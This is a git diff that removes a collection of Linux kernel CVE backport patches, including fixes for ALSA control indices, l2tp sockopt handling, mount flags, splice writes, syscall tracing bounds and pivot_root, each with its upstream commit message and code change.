-The ALSA control code expects that the range of assigned indices to a control is
-continuous and does not overflow. Currently there are no checks to enforce this.
-If a control with a overflowing index range is created that control becomes
-effectively inaccessible and unremovable since snd_ctl_find_id() will not be
-able to find it. This patch adds a check that makes sure that controls with a
-overflowing index range can not be created.
-
-Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
-Acked-by: Jaroslav Kysela <perex@perex.cz>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/control.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/sound/core/control.c b/sound/core/control.c
-index 8d6e4ba..f0b0e14 100644
---- a/sound/core/control.c
-+++ b/sound/core/control.c
-@@ -342,6 +342,9 @@ int snd_ctl_add(struct snd_card *card, struct snd_kcontrol *kcontrol)
- 	if (snd_BUG_ON(!card || !kcontrol->info))
- 		goto error;
- 	id = kcontrol->id;
-+	if (id.index > UINT_MAX - kcontrol->count)
-+		goto error;
-+
- 	down_write(&card->controls_rwsem);
- 	if (snd_ctl_find_id(card, &id)) {
- 		up_write(&card->controls_rwsem);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4943/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-4943/3.2/0001.patch
deleted file mode 100644
index 8ec81add..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4943/3.2/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 1179c8f1caca90caf4ce0eec54b499de4f1551c4 Mon Sep 17 00:00:00 2001
-From: Sasha Levin <sasha.levin@oracle.com>
-Date: Mon, 14 Jul 2014 17:02:31 -0700
-Subject: net/l2tp: don't fall back on UDP [get|set]sockopt
-
-commit 3cf521f7dc87c031617fd47e4b7aa2593c2f3daf upstream.
-
-The l2tp [get|set]sockopt() code has fallen back to the UDP functions
-for socket option levels != SOL_PPPOL2TP since day one, but that has
-never actually worked, since the l2tp socket isn't an inet socket.
-
-As David Miller points out:
-
-  "If we wanted this to work, it'd have to look up the tunnel and then
-   use tunnel->sk, but I wonder how useful that would be"
-
-Since this can never have worked so nobody could possibly have depended
-on that functionality, just remove the broken code and return -EINVAL.
-
-Reported-by: Sasha Levin <sasha.levin@oracle.com>
-Acked-by: James Chapman <jchapman@katalix.com>
-Acked-by: David Miller <davem@davemloft.net>
-Cc: Phil Turnbull <phil.turnbull@oracle.com>
-Cc: Vegard Nossum <vegard.nossum@oracle.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/l2tp/l2tp_ppp.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
-index e0f0934..437fb59 100644
---- a/net/l2tp/l2tp_ppp.c
-+++ b/net/l2tp/l2tp_ppp.c
-@@ -1351,7 +1351,7 @@ static int pppol2tp_setsockopt(struct socket *sock, int level, int optname,
- 	int err;
- 
- 	if (level != SOL_PPPOL2TP)
--		return udp_prot.setsockopt(sk, level, optname, optval, optlen);
-+		return -EINVAL;
- 
- 	if (optlen < sizeof(int))
- 		return -EINVAL;
-@@ -1477,7 +1477,7 @@ static int pppol2tp_getsockopt(struct socket *sock, int level,
- 	struct pppol2tp_session *ps;
- 
- 	if (level != SOL_PPPOL2TP)
--		return udp_prot.getsockopt(sk, level, optname, optval, optlen);
-+		return -EINVAL;
- 
- 	if (get_user(len, (int __user *) optlen))
- 		return -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4943/^3.15/0002.patch b/Patches/Linux_CVEs/CVE-2014-4943/^3.15/0002.patch
deleted file mode 100644
index d1b4c1ef..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4943/^3.15/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 3cf521f7dc87c031617fd47e4b7aa2593c2f3daf Mon Sep 17 00:00:00 2001
-From: Sasha Levin <sasha.levin@oracle.com>
-Date: Mon, 14 Jul 2014 17:02:31 -0700
-Subject: [PATCH] net/l2tp: don't fall back on UDP [get|set]sockopt
-
-The l2tp [get|set]sockopt() code has fallen back to the UDP functions
-for socket option levels != SOL_PPPOL2TP since day one, but that has
-never actually worked, since the l2tp socket isn't an inet socket.
-
-As David Miller points out:
-
-  "If we wanted this to work, it'd have to look up the tunnel and then
-   use tunnel->sk, but I wonder how useful that would be"
-
-Since this can never have worked so nobody could possibly have depended
-on that functionality, just remove the broken code and return -EINVAL.
-
-Reported-by: Sasha Levin <sasha.levin@oracle.com>
-Acked-by: James Chapman <jchapman@katalix.com>
-Acked-by: David Miller <davem@davemloft.net>
-Cc: Phil Turnbull <phil.turnbull@oracle.com>
-Cc: Vegard Nossum <vegard.nossum@oracle.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- net/l2tp/l2tp_ppp.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
-index 950909f04ee6a..13752d96275e8 100644
---- a/net/l2tp/l2tp_ppp.c
-+++ b/net/l2tp/l2tp_ppp.c
-@@ -1365,7 +1365,7 @@ static int pppol2tp_setsockopt(struct socket *sock, int level, int optname,
- 	int err;
- 
- 	if (level != SOL_PPPOL2TP)
--		return udp_prot.setsockopt(sk, level, optname, optval, optlen);
-+		return -EINVAL;
- 
- 	if (optlen < sizeof(int))
- 		return -EINVAL;
-@@ -1491,7 +1491,7 @@ static int pppol2tp_getsockopt(struct socket *sock, int level, int optname,
- 	struct pppol2tp_session *ps;
- 
- 	if (level != SOL_PPPOL2TP)
--		return udp_prot.getsockopt(sk, level, optname, optval, optlen);
-+		return -EINVAL;
- 
- 	if (get_user(len, optlen))
- 		return -EFAULT;
diff --git a/Patches/Linux_CVEs/CVE-2014-5206/^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2014-5206/^3.16/0001.patch
deleted file mode 100644
index 3ca832c9..00000000
--- a/Patches/Linux_CVEs/CVE-2014-5206/^3.16/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From a6138db815df5ee542d848318e5dae681590fccd Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman" <ebiederm@xmission.com>
-Date: Mon, 28 Jul 2014 16:26:53 -0700
-Subject: [PATCH] mnt: Only change user settable mount flags in remount
-
-Kenton Varda <kenton@sandstorm.io> discovered that by remounting a
-read-only bind mount read-only in a user namespace the
-MNT_LOCK_READONLY bit would be cleared, allowing an unprivileged user
-to the remount a read-only mount read-write.
-
-Correct this by replacing the mask of mount flags to preserve
-with a mask of mount flags that may be changed, and preserve
-all others.   This ensures that any future bugs with this mask and
-remount will fail in an easy to detect way where new mount flags
-simply won't change.
-
-Cc: stable@vger.kernel.org
-Acked-by: Serge E. Hallyn <serge.hallyn@ubuntu.com>
-Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
----
- fs/namespace.c        | 2 +-
- include/linux/mount.h | 4 +++-
- 2 files changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index 7187d01329c35..cb40449ea0dfe 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -1937,7 +1937,7 @@ static int do_remount(struct path *path, int flags, int mnt_flags,
- 		err = do_remount_sb(sb, flags, data, 0);
- 	if (!err) {
- 		lock_mount_hash();
--		mnt_flags |= mnt->mnt.mnt_flags & MNT_PROPAGATION_MASK;
-+		mnt_flags |= mnt->mnt.mnt_flags & ~MNT_USER_SETTABLE_MASK;
- 		mnt->mnt.mnt_flags = mnt_flags;
- 		touch_mnt_namespace(mnt->mnt_ns);
- 		unlock_mount_hash();
-diff --git a/include/linux/mount.h b/include/linux/mount.h
-index 839bac2709048..b637a89e1faeb 100644
---- a/include/linux/mount.h
-+++ b/include/linux/mount.h
-@@ -42,7 +42,9 @@ struct mnt_namespace;
-  * flag, consider how it interacts with shared mounts.
-  */
- #define MNT_SHARED_MASK	(MNT_UNBINDABLE)
--#define MNT_PROPAGATION_MASK	(MNT_SHARED | MNT_UNBINDABLE)
-+#define MNT_USER_SETTABLE_MASK  (MNT_NOSUID | MNT_NODEV | MNT_NOEXEC \
-+				 | MNT_NOATIME | MNT_NODIRATIME | MNT_RELATIME \
-+				 | MNT_READONLY)
- 
- #define MNT_INTERNAL_FLAGS (MNT_SHARED | MNT_WRITE_HOLD | MNT_INTERNAL | \
- 			    MNT_DOOMED | MNT_SYNC_UMOUNT | MNT_MARKED)
diff --git a/Patches/Linux_CVEs/CVE-2014-7822/3.2-^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2014-7822/3.2-^3.16/0001.patch
deleted file mode 100644
index a501664e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7822/3.2-^3.16/0001.patch
+++ /dev/null
@@ -1,72 +0,0 @@
-From 894c6350eaad7e613ae267504014a456e00a3e2a Mon Sep 17 00:00:00 2001
-From: Ben Hutchings <ben@decadent.org.uk>
-Date: Thu, 29 Jan 2015 02:50:33 +0000
-Subject: splice: Apply generic position and size checks to each write
-
-We need to check the position and size of file writes against various
-limits, using generic_write_check().  This was not being done for
-the splice write path.  It was fixed upstream by commit 8d0207652cbe
-("->splice_write() via ->write_iter()") but we can't apply that.
-
-CVE-2014-7822
-
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- fs/ocfs2/file.c | 8 ++++++--
- fs/splice.c     | 8 ++++++--
- 2 files changed, 12 insertions(+), 4 deletions(-)
-
-diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
-index d20d64c..0de24a2 100644
---- a/fs/ocfs2/file.c
-+++ b/fs/ocfs2/file.c
-@@ -2468,9 +2468,7 @@ static ssize_t ocfs2_file_splice_write(struct pipe_inode_info *pipe,
- 	struct address_space *mapping = out->f_mapping;
- 	struct inode *inode = mapping->host;
- 	struct splice_desc sd = {
--		.total_len = len,
- 		.flags = flags,
--		.pos = *ppos,
- 		.u.file = out,
- 	};
- 
-@@ -2480,6 +2478,12 @@ static ssize_t ocfs2_file_splice_write(struct pipe_inode_info *pipe,
- 			out->f_path.dentry->d_name.len,
- 			out->f_path.dentry->d_name.name, len);
- 
-+	ret = generic_write_checks(out, ppos, &len, 0);
-+	if (ret)
-+		return ret;
-+	sd.total_len = len;
-+	sd.pos = *ppos;
-+
- 	if (pipe->inode)
- 		mutex_lock_nested(&pipe->inode->i_mutex, I_MUTEX_PARENT);
- 
-diff --git a/fs/splice.c b/fs/splice.c
-index 714471d..34c2b2b 100644
---- a/fs/splice.c
-+++ b/fs/splice.c
-@@ -1013,13 +1013,17 @@ generic_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
- 	struct address_space *mapping = out->f_mapping;
- 	struct inode *inode = mapping->host;
- 	struct splice_desc sd = {
--		.total_len = len,
- 		.flags = flags,
--		.pos = *ppos,
- 		.u.file = out,
- 	};
- 	ssize_t ret;
- 
-+	ret = generic_write_checks(out, ppos, &len, S_ISBLK(inode->i_mode));
-+	if (ret)
-+		return ret;
-+	sd.total_len = len;
-+	sd.pos = *ppos;
-+
- 	pipe_lock(pipe);
- 
- 	splice_from_pipe_begin(&sd);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-7825/3.2/0001.patch
deleted file mode 100644
index 285a52c3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 6f25b4e75a87fea8087b543f3d1298d301d24ad7 Mon Sep 17 00:00:00 2001
-From: Will Deacon <will.deacon@arm.com>
-Date: Thu, 16 Aug 2012 18:14:14 +0100
-Subject: tracing/syscalls: Fix perf syscall tracing when syscall_nr == -1
-
-commit 60916a9382e88fbf5e54fd36a3e658efd7ab7bed upstream.
-
-syscall_get_nr can return -1 in the case that the task is not executing
-a system call.
-
-This patch fixes perf_syscall_{enter,exit} to check that the syscall
-number is valid before using it as an index into a bitmap.
-
-Link: http://lkml.kernel.org/r/1345137254-7377-1-git-send-email-will.deacon@arm.com
-
-Cc: Jason Baron <jbaron@redhat.com>
-Cc: Wade Farnsworth <wade_farnsworth@mentor.com>
-Cc: Frederic Weisbecker <fweisbec@gmail.com>
-Signed-off-by: Will Deacon <will.deacon@arm.com>
-Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- kernel/trace/trace_syscalls.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c
-index 7c75bbb..22a7c9b 100644
---- a/kernel/trace/trace_syscalls.c
-+++ b/kernel/trace/trace_syscalls.c
-@@ -519,6 +519,8 @@ static void perf_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- 	int size;
- 
- 	syscall_nr = syscall_get_nr(current, regs);
-+	if (syscall_nr < 0)
-+		return;
- 	if (!test_bit(syscall_nr, enabled_perf_enter_syscalls))
- 		return;
- 
-@@ -593,6 +595,8 @@ static void perf_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- 	int size;
- 
- 	syscall_nr = syscall_get_nr(current, regs);
-+	if (syscall_nr < 0)
-+		return;
- 	if (!test_bit(syscall_nr, enabled_perf_exit_syscalls))
- 		return;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2014-7825/3.2/0002.patch
deleted file mode 100644
index 03003828..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7825/3.2/0002.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 8043761416d5ae6d8fe5e95331d26465d52e8c6e Mon Sep 17 00:00:00 2001
-From: Rabin Vincent <rabin@rab.in>
-Date: Wed, 29 Oct 2014 23:06:58 +0100
-Subject: tracing/syscalls: Ignore numbers outside NR_syscalls' range
-
-commit 086ba77a6db00ed858ff07451bedee197df868c9 upstream.
-
-ARM has some private syscalls (for example, set_tls(2)) which lie
-outside the range of NR_syscalls.  If any of these are called while
-syscall tracing is being performed, out-of-bounds array access will
-occur in the ftrace and perf sys_{enter,exit} handlers.
-
- # trace-cmd record -e raw_syscalls:* true && trace-cmd report
- ...
- true-653   [000]   384.675777: sys_enter:            NR 192 (0, 1000, 3, 4000022, ffffffff, 0)
- true-653   [000]   384.675812: sys_exit:             NR 192 = 1995915264
- true-653   [000]   384.675971: sys_enter:            NR 983045 (76f74480, 76f74000, 76f74b28, 76f74480, 76f76f74, 1)
- true-653   [000]   384.675988: sys_exit:             NR 983045 = 0
- ...
-
- # trace-cmd record -e syscalls:* true
- [   17.289329] Unable to handle kernel paging request at virtual address aaaaaace
- [   17.289590] pgd = 9e71c000
- [   17.289696] [aaaaaace] *pgd=00000000
- [   17.289985] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
- [   17.290169] Modules linked in:
- [   17.290391] CPU: 0 PID: 704 Comm: true Not tainted 3.18.0-rc2+ #21
- [   17.290585] task: 9f4dab00 ti: 9e710000 task.ti: 9e710000
- [   17.290747] PC is at ftrace_syscall_enter+0x48/0x1f8
- [   17.290866] LR is at syscall_trace_enter+0x124/0x184
-
-Fix this by ignoring out-of-NR_syscalls-bounds syscall numbers.
-
-Commit cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-added the check for less than zero, but it should have also checked
-for greater than NR_syscalls.
-
-Link: http://lkml.kernel.org/p/1414620418-29472-1-git-send-email-rabin@rab.in
-
-Fixes: cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-Signed-off-by: Rabin Vincent <rabin@rab.in>
-Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- kernel/trace/trace_syscalls.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c
-index 22a7c9b..1129062 100644
---- a/kernel/trace/trace_syscalls.c
-+++ b/kernel/trace/trace_syscalls.c
-@@ -309,7 +309,7 @@ void ftrace_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- 	int syscall_nr;
- 
- 	syscall_nr = syscall_get_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 	if (!test_bit(syscall_nr, enabled_enter_syscalls))
- 		return;
-@@ -349,7 +349,7 @@ void ftrace_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- 	int syscall_nr;
- 
- 	syscall_nr = syscall_get_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 	if (!test_bit(syscall_nr, enabled_exit_syscalls))
- 		return;
-@@ -519,7 +519,7 @@ static void perf_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- 	int size;
- 
- 	syscall_nr = syscall_get_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 	if (!test_bit(syscall_nr, enabled_perf_enter_syscalls))
- 		return;
-@@ -595,7 +595,7 @@ static void perf_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- 	int size;
- 
- 	syscall_nr = syscall_get_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 	if (!test_bit(syscall_nr, enabled_perf_exit_syscalls))
- 		return;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7825/^3.17/0003.patch b/Patches/Linux_CVEs/CVE-2014-7825/^3.17/0003.patch
deleted file mode 100644
index 96490c3e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7825/^3.17/0003.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 086ba77a6db00ed858ff07451bedee197df868c9 Mon Sep 17 00:00:00 2001
-From: Rabin Vincent <rabin@rab.in>
-Date: Wed, 29 Oct 2014 23:06:58 +0100
-Subject: [PATCH] tracing/syscalls: Ignore numbers outside NR_syscalls' range
-
-ARM has some private syscalls (for example, set_tls(2)) which lie
-outside the range of NR_syscalls.  If any of these are called while
-syscall tracing is being performed, out-of-bounds array access will
-occur in the ftrace and perf sys_{enter,exit} handlers.
-
- # trace-cmd record -e raw_syscalls:* true && trace-cmd report
- ...
- true-653   [000]   384.675777: sys_enter:            NR 192 (0, 1000, 3, 4000022, ffffffff, 0)
- true-653   [000]   384.675812: sys_exit:             NR 192 = 1995915264
- true-653   [000]   384.675971: sys_enter:            NR 983045 (76f74480, 76f74000, 76f74b28, 76f74480, 76f76f74, 1)
- true-653   [000]   384.675988: sys_exit:             NR 983045 = 0
- ...
-
- # trace-cmd record -e syscalls:* true
- [   17.289329] Unable to handle kernel paging request at virtual address aaaaaace
- [   17.289590] pgd = 9e71c000
- [   17.289696] [aaaaaace] *pgd=00000000
- [   17.289985] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
- [   17.290169] Modules linked in:
- [   17.290391] CPU: 0 PID: 704 Comm: true Not tainted 3.18.0-rc2+ #21
- [   17.290585] task: 9f4dab00 ti: 9e710000 task.ti: 9e710000
- [   17.290747] PC is at ftrace_syscall_enter+0x48/0x1f8
- [   17.290866] LR is at syscall_trace_enter+0x124/0x184
-
-Fix this by ignoring out-of-NR_syscalls-bounds syscall numbers.
-
-Commit cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-added the check for less than zero, but it should have also checked
-for greater than NR_syscalls.
-
-Link: http://lkml.kernel.org/p/1414620418-29472-1-git-send-email-rabin@rab.in
-
-Fixes: cd0980fc8add "tracing: Check invalid syscall nr while tracing syscalls"
-Cc: stable@vger.kernel.org # 2.6.33+
-Signed-off-by: Rabin Vincent <rabin@rab.in>
-Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
----
- kernel/trace/trace_syscalls.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c
-index 4dc8b79c5f75d..29228c4d56969 100644
---- a/kernel/trace/trace_syscalls.c
-+++ b/kernel/trace/trace_syscalls.c
-@@ -313,7 +313,7 @@ static void ftrace_syscall_enter(void *data, struct pt_regs *regs, long id)
- 	int size;
- 
- 	syscall_nr = trace_get_syscall_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 
- 	/* Here we're inside tp handler's rcu_read_lock_sched (__DO_TRACE) */
-@@ -360,7 +360,7 @@ static void ftrace_syscall_exit(void *data, struct pt_regs *regs, long ret)
- 	int syscall_nr;
- 
- 	syscall_nr = trace_get_syscall_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 
- 	/* Here we're inside tp handler's rcu_read_lock_sched (__DO_TRACE()) */
-@@ -567,7 +567,7 @@ static void perf_syscall_enter(void *ignore, struct pt_regs *regs, long id)
- 	int size;
- 
- 	syscall_nr = trace_get_syscall_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 	if (!test_bit(syscall_nr, enabled_perf_enter_syscalls))
- 		return;
-@@ -641,7 +641,7 @@ static void perf_syscall_exit(void *ignore, struct pt_regs *regs, long ret)
- 	int size;
- 
- 	syscall_nr = trace_get_syscall_nr(current, regs);
--	if (syscall_nr < 0)
-+	if (syscall_nr < 0 || syscall_nr >= NR_syscalls)
- 		return;
- 	if (!test_bit(syscall_nr, enabled_perf_exit_syscalls))
- 		return;
diff --git a/Patches/Linux_CVEs/CVE-2014-7970/3.0/0001.patch b/Patches/Linux_CVEs/CVE-2014-7970/3.0/0001.patch
deleted file mode 100644
index d796bb59..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7970/3.0/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From c88f7bbd8026761a615c9969d186ffa2a1a3da3c Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman" <ebiederm@xmission.com>
-Date: Thu, 15 Jan 2015 17:49:27 +0000
-Subject: [PATCH] mnt: Prevent pivot_root from creating a loop in the mount
- tree
-
-Andy Lutomirski recently demonstrated that when chroot is used to set
-the root path below the path for the new ``root'' passed to pivot_root
-the pivot_root system call succeeds and leaks mounts.
-
-In examining the code I see that starting with a new root that is
-below the current root in the mount tree will result in a loop in the
-mount tree after the mounts are detached and then reattached to one
-another.  Resulting in all kinds of ugliness including a leak of that
-mounts involved in the leak of the mount loop.
-
-Prevent this problem by ensuring that the new mount is reachable from
-the current root of the mount tree.
-
-[Added stable cc.  Fixes CVE-2014-7970.  --Andy]
-
-Cc: stable@vger.kernel.org
-Reported-by: Andy Lutomirski <luto@amacapital.net>
-Reviewed-by: Andy Lutomirski <luto@amacapital.net>
-Link: http://lkml.kernel.org/r/87bnpmihks.fsf@x220.int.ebiederm.org
-Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
-Signed-off-by: Andy Lutomirski <luto@amacapital.net>
-(backported from commit 0d0826019e529f21c84687521d03f60cd241ca7d)
-CVE-2014-7970
-BugLink: http://bugs.launchpad.net/bugs/1383356
-Signed-off-by: Luis Henriques <luis.henriques@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Acked-by: Andy Whitcroft <apw@canonical.com>
-Signed-off-by: Andy Whitcroft <apw@canonical.com>
-
-Change-Id: I0fe1d090eeb4765cc49401784e44a430f9585498
----
- fs/namespace.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index 912d273d970..4f47629a4e0 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -2618,6 +2618,9 @@ SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
- 			goto out4;
- 	} else if (!is_subdir(old.dentry, new.dentry))
- 		goto out4;
-+	/* make certain new is below the root */
-+	if (!is_path_reachable(new.mnt, new.dentry, &root))
-+		goto out4;
- 	br_write_lock(vfsmount_lock);
- 	detach_mnt(new.mnt, &parent_path);
- 	detach_mnt(root.mnt, &root_parent);
diff --git a/Patches/Linux_CVEs/CVE-2014-7970/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2014-7970/3.4/0002.patch
deleted file mode 100644
index f98e9796..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7970/3.4/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 9f7d53c09a1f87ebe228b55a83c1b8f952d76260 Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman" <ebiederm@xmission.com>
-Date: Wed, 8 Oct 2014 10:42:27 -0700
-Subject: mnt: Prevent pivot_root from creating a loop in the mount tree
-
-commit 0d0826019e529f21c84687521d03f60cd241ca7d upstream.
-
-Andy Lutomirski recently demonstrated that when chroot is used to set
-the root path below the path for the new ``root'' passed to pivot_root
-the pivot_root system call succeeds and leaks mounts.
-
-In examining the code I see that starting with a new root that is
-below the current root in the mount tree will result in a loop in the
-mount tree after the mounts are detached and then reattached to one
-another.  Resulting in all kinds of ugliness including a leak of that
-mounts involved in the leak of the mount loop.
-
-Prevent this problem by ensuring that the new mount is reachable from
-the current root of the mount tree.
-
-[Added stable cc.  Fixes CVE-2014-7970.  --Andy]
-
-Reported-by: Andy Lutomirski <luto@amacapital.net>
-Reviewed-by: Andy Lutomirski <luto@amacapital.net>
-Link: http://lkml.kernel.org/r/87bnpmihks.fsf@x220.int.ebiederm.org
-Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
-Signed-off-by: Andy Lutomirski <luto@amacapital.net>
-[lizf: Backported to 3.4: adjust context]
-Signed-off-by: Zefan Li <lizefan@huawei.com>
----
- fs/namespace.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index f0f2e06..f7be8d9 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -2508,6 +2508,9 @@ SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
- 	/* make sure we can reach put_old from new_root */
- 	if (!is_path_reachable(real_mount(old.mnt), old.dentry, &new))
- 		goto out4;
-+	/* make certain new is below the root */
-+	if (!is_path_reachable(new_mnt, new.dentry, &root))
-+		goto out4;
- 	br_write_lock(vfsmount_lock);
- 	detach_mnt(new_mnt, &parent_path);
- 	detach_mnt(root_mnt, &root_parent);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-7970/^3.17/0003.patch b/Patches/Linux_CVEs/CVE-2014-7970/^3.17/0003.patch
deleted file mode 100644
index 02f15198..00000000
--- a/Patches/Linux_CVEs/CVE-2014-7970/^3.17/0003.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 0d0826019e529f21c84687521d03f60cd241ca7d Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman" <ebiederm@xmission.com>
-Date: Wed, 8 Oct 2014 10:42:27 -0700
-Subject: mnt: Prevent pivot_root from creating a loop in the mount tree
-
-Andy Lutomirski recently demonstrated that when chroot is used to set
-the root path below the path for the new ``root'' passed to pivot_root
-the pivot_root system call succeeds and leaks mounts.
-
-In examining the code I see that starting with a new root that is
-below the current root in the mount tree will result in a loop in the
-mount tree after the mounts are detached and then reattached to one
-another.  Resulting in all kinds of ugliness including a leak of that
-mounts involved in the leak of the mount loop.
-
-Prevent this problem by ensuring that the new mount is reachable from
-the current root of the mount tree.
-
-[Added stable cc.  Fixes CVE-2014-7970.  --Andy]
-
-Cc: stable@vger.kernel.org
-Reported-by: Andy Lutomirski <luto@amacapital.net>
-Reviewed-by: Andy Lutomirski <luto@amacapital.net>
-Link: http://lkml.kernel.org/r/87bnpmihks.fsf@x220.int.ebiederm.org
-Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
-Signed-off-by: Andy Lutomirski <luto@amacapital.net>
----
- fs/namespace.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index ef42d9b..74647c2 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -2820,6 +2820,9 @@ SYSCALL_DEFINE2(pivot_root, const char __user *, new_root,
- 	/* make sure we can reach put_old from new_root */
- 	if (!is_path_reachable(old_mnt, old.dentry, &new))
- 		goto out4;
-+	/* make certain new is below the root */
-+	if (!is_path_reachable(new_mnt, new.dentry, &root))
-+		goto out4;
- 	root_mp->m_count++; /* pin it so it won't go away */
- 	lock_mount_hash();
- 	detach_mnt(new_mnt, &parent_path);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-8160/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-8160/3.2/0001.patch
deleted file mode 100644
index 5c2db680..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8160/3.2/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From d7cde286daad20dd171247ea47fc5ff4868591f0 Mon Sep 17 00:00:00 2001
-From: Florian Westphal <fw@strlen.de>
-Date: Fri, 26 Sep 2014 11:35:42 +0200
-Subject: netfilter: conntrack: disable generic tracking for known protocols
-
-commit db29a9508a9246e77087c5531e45b2c88ec6988b upstream.
-
-Given following iptables ruleset:
-
--P FORWARD DROP
--A FORWARD -m sctp --dport 9 -j ACCEPT
